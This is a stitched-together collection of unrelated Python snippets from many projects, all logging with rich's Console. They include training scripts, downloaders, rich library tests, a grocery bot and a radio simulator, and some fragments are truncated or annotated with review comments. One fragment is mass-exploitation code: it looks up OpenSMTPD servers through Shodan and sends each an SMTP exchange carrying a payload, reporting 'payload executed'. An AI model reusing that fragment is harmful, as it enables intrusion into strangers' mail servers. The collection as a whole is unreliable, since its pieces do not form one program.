def menuOptions():
    """Display the top-level learning menu and dispatch to the chosen section."""
    console = Console()
    console.print(
        ":computer: Welcome to machine learning application :computer:",
        style="BOLD GREEN")

    # Top-level language/section menu.
    menu = SelectMenu()
    menu.add_choices([
        "1. Introduction to Python",
        "2. Animation in python",
        "3. Advanced Python",
    ])
    result = menu.select("Choice languages")

    if result == "1. Introduction to Python":
        console.log(":computer: Welcome to Basic python section",
                    style="BOLD Cyan")
        # Second-level menu for the basics track.
        submenu = SelectMenu()
        submenu.add_choices([
            "1. Python Introduction",
            "2. Python Flow Control",
            "3. Python Functions",
            "4. Python Datatypes in depth",
            "5. Python Files",
            "6. Python Object & Class",
            "7. Python Advanced Topics",
            "8. Python Date and time",
        ])
        basicTopics = submenu.select("Choice topic to learn")
        # Only the first three topics are wired up here; the remaining
        # choices fall through with no action (as in the original).
        if basicTopics == "1. Python Introduction":
            basics.helloPython()
        elif basicTopics == "2. Python Flow Control":
            flowControl.flowcontrolInpython()
        elif basicTopics == "3. Python Functions":
            pythonFunctions.pythonFunctions()
    elif result == "2. Animation in python":
        animatedfigures.animatedGraph()
def main():
    """Main function for single or distributed CLAPP training."""
    config = CLAPPConfig.parse_arguments()

    # Restrict visible devices before any CUDA work happens.
    os.environ['CUDA_VISIBLE_DEVICES'] = ','.join(str(gpu) for gpu in config.gpus)

    num_gpus_per_node = len(config.gpus)
    world_size = config.num_nodes * num_gpus_per_node
    distributed = world_size > 1

    # Stash the derived topology on the config object for downstream workers.
    config.num_gpus_per_node = num_gpus_per_node
    config.world_size = world_size
    config.distributed = distributed

    console = Console()
    console.log(config.__dict__)
    config.save()

    if config.distributed:
        rich.print(f"Distributed training on {world_size} GPUs.")
        # One worker process per GPU on this node.
        mp.spawn(main_worker, nprocs=config.num_gpus_per_node, args=(config, ))
    else:
        rich.print(f"Single GPU training.")
        main_worker(0, config=config)  # single machine, single gpu
def check_for_updates() -> None:
    """Check GitHub for a newer release and print its details if one exists.

    Queries the GitHub API for the latest release of
    telegram_media_downloader; on a version mismatch the release notes
    are printed as Markdown. Any failure is logged, never raised.
    """
    console = Console()
    try:
        headers: dict = {
            "Content-Type": "application/json",
            "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
        }
        connection = http.client.HTTPSConnection("api.github.com")
        connection.request(
            method="GET",
            url="/repos/Dineshkarthik/telegram_media_downloader/releases/latest",
            headers=headers,
        )
        response = connection.getresponse()
        latest_release: dict = json.loads(response.read().decode("utf-8"))
        # Local tags are prefixed with "v"; any mismatch is treated as outdated.
        if f"v{__version__}" != latest_release["tag_name"]:
            update_message: str = (
                f"## New version of Telegram-Media-Downloader is available - {latest_release['name']}\n"
                f"You are using an outdated version v{__version__} please pull in the changes using `git pull` or download the latest release.\n\n"
                f"Find more details about the latest release here - {latest_release['html_url']}"
            )
            console.print(Markdown(update_message))
    except Exception as e:
        # Update checking is best-effort; report and carry on.
        console.log(
            f"Following error occured when checking for updates\n{e.__class__}, {e}"
        )
def run():
    """Drive the full pipeline: authorize, load data/model, pick items, fill cart."""
    console = Console()
    console.rule("Cartographer")
    auth_session = kroger.authorize(console)

    with console.status("Setting up...") as status:
        status.update("Loading spreadsheet...")
        items = sheets.get_items(console)

        status.update("Loading model...")
        tokenizer, model = heuristics.load_tokenizer_and_model()
        console.log("Loaded model.")

        status.update("Picking groceries...")
        selected_items = {}
        for index, (item, count, description) in enumerate(items):
            status.update(f"Picking groceries [green]({index}/{len(items)})...")
            search_results = kroger.product_search(item, auth_session)
            # Let the model pick the best match among the search hits.
            selected = heuristics.select_item(
                item,
                search_results.json()["data"],
                description,
                tokenizer,
                model,
                console,
            )
            selected_items[selected["upc"]] = count

        status.update("Adding to cart...")
        kroger.add_to_cart(selected_items, auth_session)

    console.log("Done!")
def _add_current_path():
    """Register the current working directory as a project path."""
    from rich.console import Console

    cwd = Path.cwd().resolve()
    Console().log("Adding cwd to project-paths", {cwd.name: cwd})
    get_added_paths(str(cwd))
def generate_moved(destination: str, *, location: str, console: Console):
    """Render the 'moved' template and write it to *destination*.

    The generated script points users at *location*.
    """
    template = Path("templates") / "moved.py"
    assert template.exists()
    content = template.read_text().format(location=location)
    console.log(f" Writing [blue]{destination}[reset]")
    console.log(f" Points users to [cyan]{location}[reset]")
    Path(destination).write_text(content)
def test_justify():
    """Right-justifying a log line pads it to the console width."""
    console = Console(width=20, log_path=False, log_time=False, color_system=None)
    console.begin_capture()
    console.log("foo", justify="right")
    result = console.end_capture()
    # Fix: the expected literal had its leading padding collapsed to a single
    # space; "foo" right-justified in a width-20 console is 17 spaces + "foo".
    assert result == "foo".rjust(20) + "\n"
def print_meta(logger):
    """Print the downloader's banner/meta-data to console and logger."""
    console = Console()
    # pylint: disable = C0301
    console.log(
        f"[bold]Telegram Media Downloader v{__version__}[/bold],\n[i]{__copyright__}[/i]"
    )
    console.log(f"Licensed under the terms of the {__license__}", end="\n\n")
    # Client/device details go to the regular logger only.
    logger.info(f"Device: {DEVICE_MODEL} - {APP_VERSION}")
    logger.info(f"System: {SYSTEM_VERSION} ({LANG_CODE.upper()})")
def test_log_milliseconds():
    """A callable log_time_format replaces the rendered timestamp entirely."""

    def time_formatter(timestamp: datetime) -> Text:
        return Text("TIME")

    console = Console(
        file=io.StringIO(), width=40, log_time_format=time_formatter, log_path=False
    )
    console.log("foo")
    result = console.file.getvalue()
    # NOTE(review): trailing padding inside the expected literal may have been
    # collapsed by whitespace mangling — confirm against a real width-40 render.
    assert result == "TIME foo \n"
def render_log():
    """Render a few representative log calls and return the raw capture."""
    console = Console(
        file=io.StringIO(),
        width=80,
        force_terminal=True,
        log_time_format="[TIME]",
        color_system="truecolor",
    )
    console.log()                                # empty log line
    console.log("Hello from", console, "!")      # mixed positional renderables
    console.log(test_data, log_locals=True)      # includes a locals panel
    return console.file.getvalue()
def render_log():
    """Render sample log output with stable link ids and a fixed path name."""
    console = Console(
        file=io.StringIO(),
        width=80,
        force_terminal=True,
        log_time_format="[TIME]",
        color_system="truecolor",
        legacy_windows=False,
    )
    console.log()                                # empty log line
    console.log("Hello from", console, "!")      # mixed positional renderables
    console.log(test_data, log_locals=True)      # includes a locals panel
    captured = console.file.getvalue()
    # Normalize run-specific artifacts so the output is comparable.
    return replace_link_ids(captured).replace("test_log.py", "source.py")
def test_log():
    """Styled log output carries the expected ANSI escape sequences."""
    console = Console(
        file=io.StringIO(),
        width=80,
        color_system="truecolor",
        log_time_format="TIME",
        log_path=False,
    )
    console.log("foo", style="red")
    # NOTE(review): trailing padding inside this literal may have been lost to
    # whitespace collapsing — confirm against a real width-80 render.
    expected = "\x1b[2;36mTIME\x1b[0m\x1b[2;36m \x1b[0m\x1b[31mfoo\x1b[0m\x1b[31m \x1b[0m\n"
    result = console.file.getvalue()
    print(repr(result))
    assert result == expected
def scraper_worker_handler(event, context):
    """AWS Lambda handler: run the scraper named in the queued SQS message."""
    console = Console(file=sys.stdout, record=True)
    run_log = settings.RUN_LOGGER(start=datetime.datetime.utcnow())

    # One record per invocation; payload carries the council and scraper type.
    message = json.loads(event["Records"][0]["body"])
    council = message["council"]
    command_name = message["scraper_type"]

    console.log(f"Fetching Scraper for: {council}")
    scraper_cls = load_scraper(council, command_name)
    if not scraper_cls:
        return

    console.log(f"Begin attempting to scrape: {council}")
    options = {"council": council, "verbose": True, "aws_lambda": True}
    scraper = scraper_cls(options, console)
    try:
        if not scraper.disabled:
            scraper.run(run_log)
        else:
            console.log(f"Scraper for {council} is disabled")
    except Exception as e:
        scraper.console.log(e)
        run_log.error = traceback.format_exc()
        # This probably means aws_tidy_up hasn't been called.
        # Let's do that ourselves then
        scraper.aws_tidy_up(run_log)
    console.log(f"Finished running scraper for: {council}")
def test_locals():
    """Log a JSON-RPC batch with log_locals so the locals panel is rendered."""
    foo = (1, 2, 3)
    movies = ["Deadpool", "Rise of the Skywalker"]
    console = Console()
    console.log(
        "[b]JSON[/b] RPC [i]batch[/i]",
        [
            {"jsonrpc": "2.0", "method": "sum", "params": [1, 2, 4], "id": "1"},
            {"jsonrpc": "2.0", "method": "notify_hello", "params": [7]},
            {"jsonrpc": "2.0", "method": "subtract", "params": [42, 23], "id": "2"},
            {"foo": "boo"},
            {
                "jsonrpc": "2.0",
                "method": "foo.get",
                "params": {"name": "myself", "enable": False, "grommits": None},
                "id": "5",
            },
            {"jsonrpc": "2.0", "method": "get_data", "id": "9"},
        ],
        log_locals=True,
    )
def test_columns() -> None:
    """Exercise every progress column type against a pinned terminal capture."""
    console = Console(
        file=io.StringIO(),
        force_terminal=True,
        width=80,
        log_time_format="[TIME]",
        color_system="truecolor",
        legacy_windows=False,
        log_path=False,
        _environ={},
    )
    progress = Progress(
        "test",
        TextColumn("{task.description}"),
        BarColumn(bar_width=None),
        TimeRemainingColumn(),
        TimeElapsedColumn(),
        FileSizeColumn(),
        TotalFileSizeColumn(),
        DownloadColumn(),
        TransferSpeedColumn(),
        MofNCompleteColumn(),
        MofNCompleteColumn(separator=" of "),
        transient=True,
        console=console,
        auto_refresh=False,
        get_time=MockClock(),
    )
    task1 = progress.add_task("foo", total=10)
    task2 = progress.add_task("bar", total=7)
    with progress:
        for n in range(4):
            progress.advance(task1, 3)
            progress.advance(task2, 4)
        print("foo")
        console.log("hello")
        console.print("world")
        progress.refresh()
    from .render import replace_link_ids
    result = replace_link_ids(console.file.getvalue())
    print(repr(result))
    # NOTE(review): this literal was wrapped across lines and its internal
    # padding may have been damaged by whitespace collapsing — regenerate the
    # capture rather than trusting these bytes.  Implicit concatenation below
    # reassembles exactly the fragments visible in the source.
    expected = (
        "\x1b[?25ltest foo \x1b[38;5;237m━━━━━━━━━━\x1b[0m \x1b[36m-:--:--\x1b[0m \x1b[33m0:00:07\x1b[0m \x1b[32m0 bytes\x1b[0m \x1b[32m10 bytes\x1b[0m \x1b[32m0/10 bytes\x1b[0m \x1b[31m?\x1b[0m \x1b[32m 0/10\x1b[0m \x1b[32m 0 of 10\x1b[0m\ntest bar \x1b[38;5;237m━━━━━━━━━━\x1b[0m \x1b[36m-:--:--\x1b[0m \x1b[33m0:00:18\x1b[0m \x1b[32m0 bytes\x1b[0m \x1b[32m7 bytes \x1b[0m \x1b[32m0/7 bytes \x1b[0m \x1b[31m?\x1b[0m \x1b[32m0/7 \x1b[0m \x1b[32m0 of 7 \x1b[0m\r\x1b[2K\x1b[1A\x1b[2Kfoo\ntest foo \x1b[38;5;237m━━━━━━━━━━\x1b[0m \x1b[36m-:--:--\x1b[0m \x1b[33m0:00:07\x1b[0m \x1b[32m0 bytes\x1b[0m \x1b[32m10 bytes\x1b[0m \x1b[32m0/10 bytes\x1b[0m \x1b[31m?\x1b[0m \x1b[32m 0/10\x1b[0m \x1b[32m 0 of 10\x1b[0m\ntest bar \x1b[38;5;237m━━━━━━━━━━\x1b[0m \x1b[36m-:--:--\x1b[0m \x1b[33m0:00:18\x1b[0m \x1b[32m0 bytes\x1b[0m \x1b[32m7 bytes \x1b[0m \x1b[32m0/7 bytes \x1b[0m \x1b[31m?\x1b[0m \x1b[32m0/7 \x1b[0m \x1b[32m0 of 7 \x1b[0m\r\x1b[2K\x1b[1A\x1b[2K\x1b[2;36m[TIME]\x1b[0m\x1b[2;36m \x1b[0mhello \ntest foo \x1b[38;5;237m━━━━━━━━━━\x1b[0m \x1b[36m-:--:--\x1b[0m "
        "\x1b[33m0:00:07\x1b[0m \x1b[32m0 bytes\x1b[0m \x1b[32m10 bytes\x1b[0m \x1b[32m0/10 bytes\x1b[0m \x1b[31m?\x1b[0m \x1b[32m 0/10\x1b[0m \x1b[32m 0 of 10\x1b[0m\ntest bar \x1b[38;5;237m━━━━━━━━━━\x1b[0m \x1b[36m-:--:--\x1b[0m \x1b[33m0:00:18\x1b[0m \x1b[32m0 bytes\x1b[0m \x1b[32m7 bytes \x1b[0m \x1b[32m0/7 bytes \x1b[0m \x1b[31m?\x1b[0m \x1b[32m0/7 \x1b[0m \x1b[32m0 of 7 \x1b[0m\r\x1b[2K\x1b[1A\x1b[2Kworld\ntest foo \x1b[38;5;237m━━━━━━━━━━\x1b[0m \x1b[36m-:--:--\x1b[0m \x1b[33m0:00:07\x1b[0m \x1b[32m0 bytes\x1b[0m \x1b[32m10 bytes\x1b[0m \x1b[32m0/10 bytes\x1b[0m \x1b[31m?\x1b[0m \x1b[32m 0/10\x1b[0m \x1b[32m 0 of 10\x1b[0m\ntest bar \x1b[38;5;237m━━━━━━━━━━\x1b[0m \x1b[36m-:--:--\x1b[0m \x1b[33m0:00:18\x1b[0m \x1b[32m0 bytes\x1b[0m \x1b[32m7 bytes \x1b[0m \x1b[32m0/7 bytes \x1b[0m \x1b[31m?\x1b[0m \x1b[32m0/7 \x1b[0m \x1b[32m0 of 7 \x1b[0m\r\x1b[2K\x1b[1A\x1b[2Ktest foo \x1b[38;2;114;156;31m━━━━━━━\x1b[0m \x1b[36m0:00:00\x1b[0m \x1b[33m0:00:34\x1b[0m \x1b[32m12 \x1b[0m \x1b[32m10 \x1b[0m \x1b[32m12/10 \x1b[0m \x1b[31m1 \x1b[0m \x1b[32m12/10\x1b[0m \x1b[32m12 of 10\x1b[0m\n \x1b[32mbytes \x1b[0m \x1b[32mbytes \x1b[0m \x1b[32mbytes \x1b[0m \x1b[31mbyte/s \x1b[0m \ntest bar \x1b[38;2;114;156;31m━━━━━━━\x1b[0m \x1b[36m0:00:00\x1b[0m \x1b[33m0:00:29\x1b[0m \x1b[32m16 \x1b[0m \x1b[32m7 bytes\x1b[0m \x1b[32m16/7 \x1b[0m \x1b[31m2 \x1b[0m \x1b[32m16/7 \x1b[0m \x1b[32m16 of 7 \x1b[0m\n \x1b[32mbytes \x1b[0m \x1b[32mbytes \x1b[0m \x1b[31mbytes/s\x1b[0m \r\x1b[2K\x1b[1A\x1b[2K\x1b[1A\x1b[2K\x1b[1A\x1b[2Ktest foo \x1b[38;2;114;156;31m━━━━━━━\x1b[0m \x1b[36m0:00:00\x1b[0m \x1b[33m0:00:34\x1b[0m \x1b[32m12 \x1b[0m \x1b[32m10 \x1b[0m \x1b[32m12/10 \x1b[0m \x1b[31m1 \x1b[0m \x1b[32m12/10\x1b[0m \x1b[32m12 of 10\x1b[0m\n \x1b[32mbytes \x1b[0m \x1b[32mbytes \x1b[0m \x1b[32mbytes \x1b[0m \x1b[31mbyte/s \x1b[0m \ntest bar \x1b[38;2;114;156;31m━━━━━━━\x1b[0m \x1b[36m0:00:00\x1b[0m \x1b[33m0:00:29\x1b[0m \x1b[32m16 \x1b[0m \x1b[32m7 bytes\x1b[0m \x1b[32m16/7 \x1b[0m \x1b[31m2 \x1b[0m "
        "\x1b[32m16/7 \x1b[0m \x1b[32m16 of 7 \x1b[0m\n \x1b[32mbytes \x1b[0m \x1b[32mbytes \x1b[0m \x1b[31mbytes/s\x1b[0m \n\x1b[?25h\r\x1b[1A\x1b[2K\x1b[1A\x1b[2K\x1b[1A\x1b[2K\x1b[1A\x1b[2K"
    )
    assert result == expected
def fetch_repos(self):
    """Fetch every repository page from the GitHub API and return the list.

    Follows the `link` response header to determine the last page and walks
    all remaining pages sequentially, logging progress as it goes.
    """
    next_page = 1
    repositories = []
    console = Console()
    headers = self.set_headers()

    with console.status("[bold green]Fetching repositories from github..."):
        self.response = requests.request(self.method, url=self.url, headers=headers)
        self.update_rate_limit_info()
        repositories.extend(self.response.json())
        console.log(
            f"Success - Fetched Repositories (1 - {len(repositories)})")

    # A `link` header means the result set is paginated; parse the last page.
    if 'link' in self.response.headers:
        next_page += 1
        link_header = self.response.headers['link']
        last_page = int(
            re.findall(r'&page=(\d+)>; rel="last"', link_header)[0])
        with console.status(
                "[bold green]Fetching additional repositories..."):
            while next_page <= last_page:
                next_url = self.url + f"&page={next_page}"
                next_response = requests.request(self.method,
                                                 url=next_url,
                                                 headers=headers)
                self.update_rate_limit_info()
                next_repo_array = next_response.json()
                # Fix: reuse the already-parsed body instead of calling
                # .json() a second time on the same response.
                repositories.extend(next_repo_array)
                # Pages hold 100 repos; compute the human-readable range.
                starting_repo_index = (next_page - 1) * 100
                completed_range = f"({starting_repo_index} - {starting_repo_index + len(next_repo_array)})"
                time.sleep(.2)  # be polite to the API
                console.log(
                    f"Success - Fetched Repositories {completed_range}")
                next_page += 1

    if self.rate_limit_verbose:
        self.display_rate_limit_info()
    return repositories
def main():
    """CLI entry point: configure rich logging and run the command group."""
    from rich.logging import RichHandler

    logging.basicConfig(
        level="INFO",
        format="%(message)s",
        datefmt="[%X]",
        handlers=[RichHandler(rich_tracebacks=True)],
    )
    console = Console()
    obj = NanoContext(console)
    try:
        cli(obj=obj, show_default=True)
    except Exception as e:
        console.log("[bold red]Exception caught[/bold red]")
        # Honor the user's traceback preference from the context object.
        if obj.print_traceback:
            console.print_exception()
        else:
            console.log(e)
def deploy_public_sandbox(uses: str):
    """
    Deploy a public sandbox to Jina Hub.

    :param uses: the executor uses string
    :return: the host and port of the sandbox
    """
    scheme, name, tag, secret = parse_hub_uri(uses)
    payload = {
        'name': name,
        'tag': tag if tag else 'latest',
        'jina': __version__,
    }

    # Fix: Console is defined in rich.console (it only happened to be
    # re-exported via rich.progress).
    from rich.console import Console
    import requests

    console = Console()

    # First check whether a sandbox already exists for this executor.
    host = None
    try:
        res = requests.get(
            url=get_hubble_url_v2() + '/rpc/sandbox.get',
            params=payload,
            headers=get_request_header(),
        ).json()
        if res.get('code') == 200:
            host = res.get('data', {}).get('host', None)
    except Exception:
        raise

    if host:
        return host, 443

    with console.status(
        f"[bold green]Deploying sandbox for ({name}) since no existing one..."
    ):
        try:
            # Fix: renamed from `json` — the original shadowed the json module.
            resp_json = requests.post(
                url=get_hubble_url_v2() + '/rpc/sandbox.create',
                json=payload,
                headers=get_request_header(),
            ).json()
            host = resp_json.get('data', {}).get('host', None)
            livetime = resp_json.get('data', {}).get('livetime', '15 mins')
            if not host:
                raise Exception(f'Failed to deploy sandbox: {resp_json}')

            console.log(f"Deployment completed: {host}")
            console.log(
                f"[bold green]This sandbox will be removed when no traffic during {livetime}"
            )
        except BaseException:  # was a bare `except:`; same semantics, now explicit
            console.log("Deployment failed")
            raise

    return host, 443
def parse_dx(dx: Analysis, fn_match=None, outfile=None):
    """Collect JNI method signatures from every internal class in *dx*.

    Writes the result as JSON to *outfile*, or pretty-prints it when no
    outfile is given. *fn_match* optionally filters by class name.
    """
    console = Console()
    out = {}
    out.update(JNI_COMMON)
    count = 0
    for cx in dx.get_internal_classes():
        methods = parse_class_def(cx.get_class())
        count += 1
        if not methods:
            continue
        cname = methods[0].jclass
        # Optional class-name filter.
        if fn_match and not fn_match(cname):
            continue
        for method in methods:
            out.update(method.as_dict)

    console.log(f"Parse {count} classes.")
    console.log(f"Found {len(out)} JNI methods.")

    if outfile:
        with open(outfile, 'w') as f:
            json.dump(out, f, indent=2, ensure_ascii=False)
    else:
        console.print_json(data=out)
def main() -> None:
    """Generate all get-pip script variants, plus legacy 'moved' stubs."""
    console = Console()

    with console.status("Fetching pip versions..."):
        pip_versions = get_all_pip_versions()
    console.log(f"Found {len(pip_versions)} available pip versions.")
    console.log(f"Latest version: {max(pip_versions)}")

    with console.status("Generating scripts...") as status:
        for variant, mapping in populated_script_constraints(SCRIPT_CONSTRAINTS):
            status.update(f"Working on [magenta]{variant}")
            console.log(f"[magenta]{variant}")
            generate_one(variant, mapping, console=console,
                         pip_versions=pip_versions)

    # Stubs that redirect users from old script locations to the new ones.
    if MOVED_SCRIPTS:
        console.log("[magenta]Generating 'moved' scripts...")
        with console.status("Generating 'moved' scripts...") as status:
            for legacy, current in MOVED_SCRIPTS.items():
                status.update(f"Working on [magenta]{legacy}")
                generate_moved(legacy, console=console, location=current)
def __print_step(step: Step, store: frozendict) -> None:
    """
    Prints passed step and store to the console

    :param step:
    :param store:
    :return: None
    """
    console = Console()
    step_name = step.__class__.__name__
    console.log('Current step is -> ', step_name, f'({step.__module__})')
    console.log(f'{step.__class__.__name__} STORE STATE')
    console.print(store.__dict__, overflow='fold')
    console.log('\n\n')
def execute(self, app_path, clients, check, delete):
    """Run the full unused-resources workflow: fetch, analyze, report,
    optionally fail the build (*check*) and/or remove the files (*delete*)."""
    self.reporter.apps(app_path, clients)
    app_name = app_path.split("/")[-1]

    # fetch resources data
    console = Console()
    self.reporter.resources_processing_started()
    with console.status("[bold green]Processing project resources..."):
        packaged_resources = self.resources_fetcher.fetch_packaged_resources(
            app_path)
        console.log(f"{app_name} - packaged resources processed!")
        usage_references = self.resources_fetcher.fetch_used_resources(
            app_path)
        console.log(f"{app_name} - used resources processed!")
        # Merge in every client module's usages as well.
        for client in clients:
            client_app_name = client.split("/")[-1]
            usage_references = usage_references.union(
                self.resources_fetcher.fetch_used_resources(client))
            console.log(f"{client_app_name} - used resources processed!")

    # analyze data
    analysis = self.analyzer.analyze(
        app_path.split("/")[-1], usage_references, packaged_resources)

    # report
    self.reporter.reporting_started(analysis)
    self.reporter.report(analysis)

    # check: fail loudly when unused resources remain
    if check:
        try:
            self.validator.validate(analysis)
        except UnusedResourcesException as e:
            paths = "\n".join([r.filepath for r in e.unused_resources])
            self.reporter.error(
                f"\nUnused Resources have been found!\n{paths}")
            sys.exit(1)

    if delete:
        resources_to_delete = set.union(
            *analysis.unused_resources.values())
        self.resources_modifier.delete_resources(resources_to_delete)
        self.reporter.deletion_completed(len(resources_to_delete))
async def create(
    cls,
    console: Console,
    bake_id: str,
    client: Client,
    storage: Storage,
    *,
    polling_timeout: Optional[float] = 1,
    project_role: Optional[str] = None,
) -> AsyncIterator["BatchExecutor"]:
    """Build a started BatchExecutor for *bake_id* and yield it,
    guaranteeing it is stopped when the caller's block exits."""
    storage = storage.with_retry_read()

    console.log("Fetch bake data")
    bake_storage = storage.bake(id=bake_id)
    bake = await bake_storage.get()
    # Prefer the attempt recorded on the bake; otherwise fetch the latest.
    if bake.last_attempt:
        attempt = bake.last_attempt
        attempt_storage = bake_storage.attempt(id=bake.last_attempt.id)
    else:
        attempt_storage = bake_storage.last_attempt()
        attempt = await attempt_storage.get()

    console.log("Fetch configs metadata")
    flow = await get_running_flow(bake, client, bake_storage,
                                  attempt.configs_meta)

    console.log(f"Execute attempt #{attempt.number}")
    executor = cls(
        console=console,
        flow=flow,
        bake=bake,
        attempt=attempt,
        client=RetryReadNeuroClient(client),
        storage=attempt_storage,
        bake_storage=bake_storage,
        project_storage=storage.project(id=bake.project_id),
        polling_timeout=polling_timeout,
        project_role=project_role,
    )
    executor._start()
    try:
        yield executor
    finally:
        executor._stop()
from rich.table import Table
from rich.prompt import Prompt

# NOTE(review): Console, track, sleep and (rich's) print are used below but not
# imported in this fragment — presumably imported earlier in the file; confirm.

cpf = 0
conf = 0
opc = 0

prompt = Prompt()
console = Console()

# Plan catalogue shown after the CPF lookup.
table = Table(title="DJHOW TELECOM\n")
table.add_column("Plano", style="bold green")
table.add_column("Velocidade", style="bold blue")
table.add_column("Valor", style="bold yellow")
table.add_row("Básico", "100 Mbps", "R$ 50,00")
table.add_row("Premium", "250 Mbps", "R$ 80,00")
table.add_row("Master", "1 Gbps", "R$ 150,00")

while conf == 0:
    cpf = int(input("Informe o número do seu CPF: "))
    # Fix: Prompt.ask returns a string, so the original `conf` was never equal
    # to the integer 0 and the loop exited even when the user answered "0"
    # (não). Cast to int so answering 0 re-prompts for the CPF.
    conf = int(prompt.ask(
        f'CPF informado: [on black]{cpf}[/]. Correto (1-sim/0-não)?'))

for i in track(range(10), "Aguarde enquanto buscamos seu CPF no sistema..."):
    sleep(1)

print(" ")
print(":white_check_mark: Análise finalizada!")
print(" ")
console.log(table)
if __name__ == "__main__":
    args = parse_arguments()
    workdir = os.path.join(os.path.abspath(args.workdir), args.workdirtag)
    inputfile = os.path.abspath(args.inputfile)
    emb_folder = os.path.abspath(args.embedding_scripts_folder)
    # NOTE(review): split("_") can never yield tokens containing "_", so only
    # "2017"/"2018" can match here — "2016_preVFP"/"2016_postVFP" look
    # unreachable; confirm the intended folder naming convention.
    era = [
        s for s in emb_folder.split("_")
        if s in ["2016_preVFP", "2016_postVFP", "2017", "2018"]
    ][0]
    # Fix: close the config file deterministically instead of leaking the
    # handle from a bare open() call.
    with open("scripts/ul_config.yaml", "r") as config_file:
        config = yaml.safe_load(config_file)
    main_cmssw = os.path.abspath(config["cmssw_version"][era]["main"])
    hlt_cmssw = os.path.abspath(config["cmssw_version"][era]["hlt"])
    console.log(f"Using main CMSSW version: {main_cmssw}")
    console.log(f"Using HLT CMSSW version: {hlt_cmssw}")

    start_index = 0
    tasks = embedding_order
    if args.run_preselection:
        # Preselection replaces the whole task list when available.
        if "preselection.py" in os.listdir(emb_folder):
            tasks = ["preselection.py"]
            start_index = 0
        else:
            console.print("preselection.py not found in embedding folder")
            raise FileNotFoundError
    else:
        if not args.run_all:
            # Let the user pick where to resume in the pipeline.
            starttask = enquiries.choose("Pick tasks to start with",
                                         embedding_order)
            start_index = embedding_order.index(starttask)
# NOTE(review): this fragment begins mid-list-literal — the enclosing
# `async def` (which defines `writer`, `reader`, `addr`, `port`, `datas`)
# starts outside the visible source, so its nesting cannot be reconstructed
# safely here. Left byte-identical. The trailing portion appears to be
# module-level code that queries Shodan for OpenSMTPD hosts and fires the
# exploit coroutine at each target — presumably; verify against the full file.
b'DATA\r\n', b'\r\nxxx\r\n.\r\n', b'QUIT\r\n', ] for data in datas: writer.write(data) response = await receive(reader) console.log(f'{"%s:%d" % (addr, port):<21}[white]([green]success: payload executed[/green])[/white]') except: return loop = asyncio.get_event_loop() client = shodan.Shodan(key=SHODAN_API_KEY) console.log('gathering targets...') search_result = client.search('OpenSMTPD') targets = [(match['ip_str'], match['port']) for match in search_result['matches']] tasks = [] console.log('scraped %d ips and ports' % len(targets)) for addr, port in targets: tasks.append(exploit(addr, port, PAYLOAD)) loop.run_until_complete(asyncio.wait(tasks))
# Build the (tokenized pattern, tag) training pairs from the intents file.
# Top-level names are kept unchanged: later code (e.g. the hyper-parameter
# section) relies on them.
all_words = []
xy = []
for intent in intents['intents']:
    tag = intent['tag']
    tags.append(tag)
    for pattern in intent['patterns']:
        w = tokenize(pattern)
        all_words.extend(w)
        xy.append((w, tag))

# Stem everything and drop punctuation; dedupe and sort both vocabularies.
ignore_words = ['?', '.', '!']
all_words = [stem(w) for w in all_words if w not in ignore_words]
all_words = sorted(set(all_words))
tags = sorted(set(tags))

console.log(len(xy), "patterns")
console.log(len(tags), f"tags: {tags}")
console.log(len(all_words), f"unique stemmed words: {all_words}")

# Vectorize: bag-of-words features, tag index as the label.
X_train = []
y_train = []
for (pattern_sentence, tag) in xy:
    bag = bag_of_words(pattern_sentence, all_words)
    X_train.append(bag)
    label = tags.index(tag)
    y_train.append(label)

X_train = np.array(X_train)
y_train = np.array(y_train)

# Hyper-parameters
def hermes(args: Optional[List[str]] = None) -> None:
    """HermesPy Command Line Interface.

    Default entry point to execute hermespy `.yml` files via terminals.

    Args:
        args ([List[str], optional): Command line arguments.
            By default, the system argument vector will be interpreted.
    """
    # Recover command line arguments from system if none are provided
    if args is None:
        args = sys.argv[1:]

    parser = argparse.ArgumentParser(
        description='HermesPy - The Heterogeneous Mobile Radio Simulator',
        prog='hermes')
    parser.add_argument(
        "-p", help="settings directory from which to read the configuration",
        type=str)
    parser.add_argument(
        "-o", help="output directory to which results will be dumped",
        type=str)
    parser.add_argument("-s", help="style of result plots", type=str)
    parser.add_argument('-t', '--test', action='store_true',
                        help='run in test-mode, does not dump results')
    parser.add_argument('-l', '--log', action='store_true',
                        help='log the console information to a txt file')
    arguments = parser.parse_args(args)

    input_parameters_dir = arguments.p
    results_dir = arguments.o
    style = arguments.s

    # Create console
    console = Console(record=arguments.log)
    console.show_cursor(False)

    # Draw welcome header
    console.print(
        "\n[bold green]Welcome to HermesPy - The Heterogeneous Radio Mobile Simulator\n"
    )
    console.print(f"Version: {__version__}")
    console.print(f"Maintainer: {__maintainer__}")
    console.print(f"Contact: {__email__}")
    console.print(
        "\nFor detailed instructions, refer to the documentation https://barkhausen-institut.github.io/hermespy"
    )
    console.print(
        "Please report any bugs to https://github.com/Barkhausen-Institut/hermespy/issues\n"
    )

    # Validate command line parameters
    if not input_parameters_dir:
        input_parameters_dir = os.path.join(os.getcwd(), '_settings')
    elif not (os.path.isabs(input_parameters_dir)):
        input_parameters_dir = os.path.join(os.getcwd(), input_parameters_dir)

    console.log(f"Configuration will be read from '{input_parameters_dir}'")

    with console.status("Initializing Environment...", spinner='dots'):
        ##################
        # Import executable from YAML config dump
        factory = Factory()

        try:
            # Load serializable objects from configuration files
            serializables: List[Serializable] = factory.load(
                input_parameters_dir)

            # Filter out non-executables from the serialization list
            executables: List[Executable] = [
                s for s in serializables if isinstance(s, Executable)
            ]

            # Abort execution if no executable was found
            if len(executables) < 1:
                console.log(
                    "No executable routine was detected, aborting execution",
                    style="red")
                exit(-1)

            # For now, only single executables are supported
            executable = executables[0]

            # Configure executable
            if results_dir is None:
                executable.results_dir = Executable.default_results_dir()
            else:
                executable.results_dir = results_dir

        except ConstructorError as error:
            # Fix: `file=sys.stderr` was passed to str.format (where it was
            # silently ignored) instead of print; the message now actually
            # goes to stderr.
            print(
                "\nYAML import failed during parsing of line {} in file '{}':\n\t{}"
                .format(error.problem_mark.line, error.problem_mark.name,
                        error.problem),
                file=sys.stderr)
            exit(-1)

        # Configure console
        executable.console = console

        # Configure style
        if style is not None:
            executable.style = style

        # Inform about the results directory
        console.log("Results will be saved in '{}'".format(
            executable.results_dir))

        # Dump current configuration to results directory
        if not arguments.test:
            shutil.copytree(input_parameters_dir, executable.results_dir,
                            dirs_exist_ok=True)

    ##################
    # run simulation
    executable.execute()

